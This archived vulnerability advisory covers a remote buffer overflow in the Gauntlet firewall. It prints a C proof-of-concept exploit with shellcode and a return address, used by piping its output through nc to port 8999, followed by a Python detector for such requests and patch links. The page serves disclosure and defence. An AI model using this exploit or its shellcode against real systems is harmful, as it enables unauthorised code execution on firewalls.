TUCoPS :: Unix :: General :: gauntl5.htm



Gauntlet buffer overflow
Vulnerability
 Gauntlet
Affected
 Gauntlet
Description
 This was posted to the Gauntlet User list. The claim is that
 there is no exploit "in the wild" and that the only holders of
 the code are NAI and Garrison Tech, and that they don't plan to
 release it, which is not true (see below). Of course, nobody else
 will figure it out, right? Nice to have a buffer overflow in a
 firewall in any case.
 Below is proof of concept code. Since this exploit exists, it
 gives us new fear that there is probably more to come. Security
 vendors need to pay better attention to the code they put out.
 Pix, Checkpoint, Gauntlet, all have exploits that came out this
 year.
 So here it is, script kiddies don't bother, this code won't help
 you. It is written to run a test file called /bin/zz.
 Just throw a file called zz in /bin on the Gauntlet firewall and
 chmod it to 700. Inside the zz file you should have it do
 something that will leave you a log. Here is a real simple
 example.
 #!/bin/sh
 echo "IT RAN"> /tmp/TEST
 And here comes the exploit:
 /*
  * Animal.c
  *
  * Remote Gauntlet BSDI proof of concept exploit.
  * Garrison technologies may have found it, but I am the
  * one who released it. ;) I do not have a Sparc or I would
  * write up the Solaris one too. If you have one, please
  * make the changes needed and post it. Thanks.
  *
  * Script kiddies can go away, this will only execute a file
  * named /bin/zz on the remote firewall. To test this code,
  * make a file named /bin/zz and chmod it to 700.
  * I suggest for the test you just have the zz file make a note
  * in syslog or whatever makes you happy.
  *
  * This code is intended for proof of concept only.
  *
  * _Gramble_
  * Hey BuBBles
  *
  * To use:
  * # Animal | nc <address> 8999
  */

 #include <stdio.h>
 #include <string.h>   /* strlen() was used without its header */

 char data[364];

 int main(void) {
     int i;
     char shelloutput[80];

     /* just borrowed this execute code from another exploit */
     unsigned char shell[] =
         "\x90"
         "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
         "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
         "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";

     /* fill data[] with 264 bytes of 0x90, then the four address
      * bytes, then a terminating NUL (the loop has no braces, so
      * only the first assignment is repeated) */
     for (i = 0; i < 264; i++)
         data[i] = 0x90;
     data[i] = 0x30; i++;
     data[i] = 0x9b; i++;
     data[i] = 0xbf; i++;
     data[i] = 0xef; i++;
     data[i] = 0x00;

     /* copy the code bytes into a NUL-terminated string buffer */
     for (i = 0; i < (int)strlen((char *)shell); i++)
         shelloutput[i] = shell[i];
     shelloutput[i] = 0x00;

     printf("10003.http://%s%s", data, shelloutput);
     return 0;
 }
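 The PoC above sends a single "10003.http://" request to port 8999 whose URL field is padded with 264 bytes of 0x90 before anything else. The following is an added detection example, not part of the original post or of Gauntlet: it classifies one such message and flags the traits visible in the PoC (oversized URL field, a long 0x90 run, non-ASCII bytes). The length and run thresholds are assumptions chosen for this example, and the sample messages are constructed, not captured.

```python
import re

# Prefix and destination port exactly as they appear in the PoC above.
GAUNTLET_PORT = 8999
REQ_PREFIX = b"10003.http://"

# Thresholds are assumptions for this example, not Gauntlet settings.
# The PoC puts 264 bytes of 0x90 in front of the address bytes, so a
# much shorter run is already far outside what a URL should contain.
MAX_URL_LEN = 200
MIN_NOP_RUN = 32

NOP_RUN = re.compile(rb"\x90{%d,}" % MIN_NOP_RUN)


def inspect_request(payload: bytes, dst_port: int) -> dict:
    """Classify one message sent toward the Gauntlet proxy port.

    Returns {'suspicious': bool, 'reasons': [str, ...]}; messages for
    other ports or without the request prefix are not examined.
    """
    reasons = []
    if dst_port != GAUNTLET_PORT or not payload.startswith(REQ_PREFIX):
        return {"suspicious": False, "reasons": reasons}
    url = payload[len(REQ_PREFIX):]
    if len(url) > MAX_URL_LEN:
        reasons.append(f"url field is {len(url)} bytes (> {MAX_URL_LEN})")
    m = NOP_RUN.search(url)
    if m:
        reasons.append(f"run of {len(m.group())} 0x90 bytes in url field")
    if any(b >= 0x80 for b in url):
        reasons.append("non-ASCII bytes in url field")
    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed samples (not real captures).
BENIGN = REQ_PREFIX + b"www.example.com/index.html"
# Same shape as the PoC: 264 bytes of 0x90 followed by filler bytes.
OVERFLOW_SHAPED = REQ_PREFIX + b"\x90" * 264 + b"AAAA"

if __name__ == "__main__":
    for name, msg in (("benign", BENIGN), ("overflow-shaped", OVERFLOW_SHAPED)):
        print(name, inspect_request(msg, GAUNTLET_PORT))
```

 Feed `inspect_request` the reassembled TCP payload of each connection to port 8999; it is a shape check, so a benign client that legitimately sends a long URL will need the length threshold raised.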
Solution
 Patches are available from
 http://www.tis.com/support/patchpage.html
 the patch you need is cyber.patch for whatever version you are
 currently running. There is no released patch for Gauntlet 4.1;
 however, if you refer to the advisory you can implement the
 workaround detailed in that advisory.
 Network Associates released a patch to address this issue. See:
 http://www.pgp.com/jump/gauntlet_advisory.asp
 for further information.
